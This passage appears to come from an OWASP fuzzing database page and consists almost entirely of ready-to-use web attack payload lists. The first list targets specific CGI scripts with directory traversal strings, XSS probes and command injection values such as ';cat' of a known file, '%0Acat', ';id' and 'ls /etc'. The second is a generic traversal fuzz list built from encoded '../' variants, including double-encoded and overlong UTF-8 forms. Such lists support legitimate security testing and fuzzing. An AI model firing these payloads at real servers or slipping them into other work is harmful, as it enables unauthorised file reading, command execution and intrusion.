ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}<br />
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E<br />
stat.pl<br />
stat/<br />
stats-bin-p/reports/index.html<br />
stats.pl<br />
stats.prf<br />
stats/<br />
stats/statsbrowse.asp?filepath=c:\&Opt=3<br />
stats_old/<br />
statsconfig<br />
statusconfig.pl<br />
statview.pl<br />
store.cgi?<br />
store/agora.cgi?cart_id=<script>alert('XSS')</script><br />
store/agora.cgi?page=whatever33.html<br />
store/index.cgi?page=../../../../../../../..{KNOWNFILE}<br />
story.pl?next=../../../../../../../../../..{KNOWNFILE}%00<br />
story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00<br />
survey<br />
survey.cgi<br />
sws/admin.html<br />
sws/manager.pl<br />
tablebuild.pl<br />
talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&action=view&matchview=1<br />
tcsh<br />
technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../..{KNOWNFILE}<br />
test-cgi.tcl<br />
test-cgi?/*<br />
test-env<br />
test.cgi<br />
test/test.cgi<br />
texis/junk<br />
texis/phine<br />
textcounter.pl<br />
tidfinder.cgi<br />
tigvote.cgi<br />
title.cgi<br />
tpgnrock<br />
traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}<br />
troops.cgi<br />
ttawebtop.cgi/?action=start&pg=../../../../../../../../../..{KNOWNFILE}<br />
ultraboard.cgi<br />
ultraboard.pl<br />
unlg1.1<br />
unlg1.2<br />
update.dpgs<br />
upload.cgi<br />
uptime<br />
urlcount.cgi?%3CIMG%20<br />
ustorekeeper.pl?command=goto&file=../../../../../../../../../..{KNOWNFILE}<br />
utm/admin<br />
utm/utm_stat<br />
view-source<br />
view-source?view-source<br />
view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00<br />
viewcvs.cgi/viewcvs/?cvsroot=<script>alert('XSS')</script><br />
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\<br />
viewlogs.pl<br />
viewsource?{KNOWNFILE}<br />
viralator.cgi<br />
virgil.cgi<br />
vote.cgi<br />
vpasswd.cgi<br />
vq/demos/respond.pl?<script>alert('XSS')</script><br />
w3-msql<br />
w3-sql<br />
wais.pl<br />
way-board.cgi?db={KNOWNFILE}%00<br />
way-board/way-board.cgi?db={KNOWNFILE}%00<br />
webais<br />
webbbs.cgi<br />
webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20{KNOWNFILE}<br />
webcart/webcart.cgi?CONFIG=mountain&CHANGE=YE<br />
webdist.cgi?distloc=;cat%20{KNOWNFILE}<br />
webdriver<br />
webgais<br />
webif.cgi<br />
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
webmap.cgi<br />
webnews.pl<br />
webplus?about<br />
webplus?script=../../../../../../../../../..{KNOWNFILE}<br />
websendmail<br />
webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}<br />
webutil.pl<br />
webutils.pl<br />
webwho.pl<br />
where.pl?sd=ls%20/etc<br />
whois.cgi?action=load&whois=%3Bid<br />
whois.cgi?lookup=;&ext=/bin/cat%20{KNOWNFILE}<br />
whois/whois.cgi?lookup=;&ext=/bin/cat%20{KNOWNFILE}<br />
whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}<br />
windmail<br />
wrap<br />
wrap.cgi<br />
ws_ftp.ini<br />
www-sql<br />
wwwadmin.pl<br />
wwwboard.cgi.cgi<br />
wwwboard.pl<br />
wwwstats.pl<br />
wwwthreads/3tvars.pm<br />
wwwthreads/w3tvars.pm<br />
wwwwais<br />
zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00<br />
zsh<br />
</pre><br />
<br />
=== Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879) ===<br />
<pre><br />
# Generic 8 Directory Deep Traversal Fuzz (17 March 2010) <br />
# Derived from the awesome "Directory Traversal Fuzzing Code" v0.2 by Luca Carettoni<br />
# Did some cleanup & removed anything to the right of {FILE} for inclusion in a<br />
# separate fuzzfile for more flexibiity, for the OWASP Fuzzing Code Database. <br />
# adam.muntner@uietmove.com <br />
<br />
../{FILE}<br />
../../{FILE}<br />
../../../{FILE}<br />
../../../../{FILE}<br />
../../../../../{FILE}<br />
../../../../../../{FILE}<br />
../../../../../../../{FILE}<br />
../../../../../../../../{FILE}<br />
..%2f{FILE}<br />
..%2f..%2f{FILE}<br />
..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
..%252f{FILE}<br />
..%252f..%252f{FILE}<br />
..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
..\{FILE}<br />
..\..\{FILE}<br />
..\..\..\{FILE}<br />
..\..\..\..\{FILE}<br />
..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\..\..\{FILE}<br />
..%255c{FILE}<br />
..%255c..%255c{FILE}<br />
..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%5c..%5c{FILE}<br />
..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
..%c0%af{FILE}<br />
..%c0%af..%c0%af{FILE}<br />
..%c0%af..%c0%af..%c0%af{FILE}<br />
..%c0%af..%c0%af..%c0%af..%c0%af{FILE}<br />
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}<br />
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}<br />
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}<br />
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}<br />
%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae%c0%af{FILE}<br />
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}<br />
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}<br />
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}<br />
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}<br />
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}<br />
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}<br />
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}<br />
..%25c0%25af{FILE}<br />
..%25c0%25af..%25c0%25af{FILE}<br />
..%25c0%25af..%25c0%25af..%25c0%25af{FILE}<br />
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}<br />
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}<br />
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}<br />
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}<br />
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}<br />
%25c0%25ae%25c0%25ae/{FILE}<br />
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}<br />
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}<br />
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}<br />
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}<br />
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}<br />
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}<br />
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}<br />
%25c0%25ae%25c0%25ae%25c0%25af{FILE}<br />
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}<br />
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}<br />
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}<br />
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}<br />
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}<br />
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}<br />
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}<br />
..%c1%9c{FILE}<br />
..%c1%9c..%c1%9c{FILE}<br />
..%c1%9c..%c1%9c..%c1%9c{FILE}<br />
..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}<br />
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}<br />
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}<br />
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}<br />
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}<br />
%c0%ae%c0%ae\{FILE}<br />
%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}<br />
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}<br />
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}<br />
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}<br />
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}<br />
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}<br />
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}<br />
%c0%ae%c0%ae%c1%9c{FILE}<br />
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}<br />
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}<br />
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}<br />
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}<br />
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}<br />
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}<br />
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}<br />
..%25c1%259c{FILE}<br />
..%25c1%259c..%25c1%259c{FILE}<br />
..%25c1%259c..%25c1%259c..%25c1%259c{FILE}<br />
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}<br />
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}<br />
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}<br />
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}<br />
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}<br />
%25c0%25ae%25c0%25ae\{FILE}<br />
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}<br />
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}<br />
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}<br />
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}<br />
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}<br />
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}<br />
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}<br />
%25c0%25ae%25c0%25ae%25c1%259c{FILE}<br />
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}<br />
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}<br />
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}<br />
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}<br />
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}<br />
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}<br />
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}<br />
..%%32%66{FILE}<br />
..%%32%66..%%32%66{FILE}<br />
..%%32%66..%%32%66..%%32%66{FILE}<br />
..%%32%66..%%32%66..%%32%66..%%32%66{FILE}<br />
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}<br />
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}<br />
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}<br />
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}<br />
%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65%%32%66{FILE}<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}<br />
..%%35%63{FILE}<br />
..%%35%63..%%35%63{FILE}<br />
..%%35%63..%%35%63..%%35%63{FILE}<br />
..%%35%63..%%35%63..%%35%63..%%35%63{FILE}<br />
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}<br />
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}<br />
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}<br />
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}<br />
%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
